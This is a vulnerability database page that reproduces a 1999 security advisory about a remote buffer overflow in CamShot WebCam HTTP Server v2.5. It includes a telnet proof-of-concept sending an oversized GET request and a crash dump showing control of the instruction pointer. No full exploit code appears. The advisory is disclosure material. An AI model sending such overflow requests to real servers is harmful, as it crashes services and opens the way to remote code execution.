Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

camshot.overflow.txt

🗓️ 31 Dec 1999 00:00:00Reported by Underground Security Systems ResearchType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 33 Views

Local/Remote Buffer Overflow in CamShot WebCam HTTP Server v2.5 for Windows systems detected.

Code
`---------- Forwarded message ----------  
From: "Ussr Labs" <[email protected]>  
To: "TECHNOTRONIC" <[email protected]>  
Subject: Local / Remote GET Buffer Overflow Vulnerability in CamShot WebC=  
am HTTP Server v2.5 for Win9x/NT  
Date: Thu, 30 Dec 1999 14:04:14 -0300  
Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP  
Server v2.5 for Win9x/NT  
  
USSR Advisory Code: USSR-99028  
  
Release Date:  
December 30, 1999 [4/5]  
  
Systems Affected:  
CamShot WebCam HTTP Server v2.5 for Win9x and possibly others versions.  
  
About The Software:  
CamShot is a Windows 95/98/NT web server that serves up web pages contain=  
ing  
time  
stamped images captured from a video camera. The images can be viewed fro=  
m  
anywhere  
on the network with a web browser. CamShot works with =91Video For Window=  
s  
compatible  
video equipment. Finally a cheap and simple way to do remote surveillance=  
is  
here!.  
  
THE PROBLEM  
  
UssrLabs found a Local / Remote Buffer overflow, The code that handles GE=  
T  
commands  
has an unchecked buffer that will allow arbitrary code to be executed if =  
it  
is overflowed.  
  
Do you do the w00w00?  
This advisory also acts as part of w00giving. This is another contributio=  
n  
to w00giving for all you w00nderful people out there. You do know what  
w00giving is don't you? http://www.w00w00.org/advisories.html  
  
Example  
[hell@imahacker]$ telnet die.communitech.net 80  
Trying example.com...  
Connected to die.communitech.net  
Escape character is '^]'.  
GET (buffer) HTTP/1.1 <enter><enter>  
  
Where [buffer] is aprox. 2000 characters. At his point the server overflo=  
ws.  
  
And in remote machine someone will be see something like this.  
  
CAMSHOT caused an invalid page fault in  
module <unknown> at 0000:61616161.  
Registers:  
EAX=3D0069fa74 CS=3D017f EIP=3D61616161 EFLGS=3D00010246  
EBX=3D0069fa74 SS=3D0187 ESP=3D005a0038 EBP=3D005a0058  
ECX=3D005a00dc DS=3D0187 ESI=3D816238f4 FS=3D33ff  
EDX=3Dbff76855 ES=3D0187 EDI=3D005a0104 GS=3D0000  
Bytes at CS:EIP:  
  
Stack dump:  
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74  
005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8  
  
Binary or source for this Exploit (wen we finish it):  
  
http://www.ussrback.com/  
  
Vendor Status:  
Informed.  
  
Vendor Url: http://www.broadgun.com/arcit/index.html  
Program Url: http://broadgun.com/Camshot.htm  
  
Credit: USSRLABS  
  
SOLUTION  
Noting yet.  
  
Greetings:  
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic an=  
d  
Wiretrip.  
  
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h  
http://www.ussrback.com  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Dec 1999 00:00Current
buffer overflow vulnerabilitycamshot webcamwindows 95/98/ntussr advisory.
33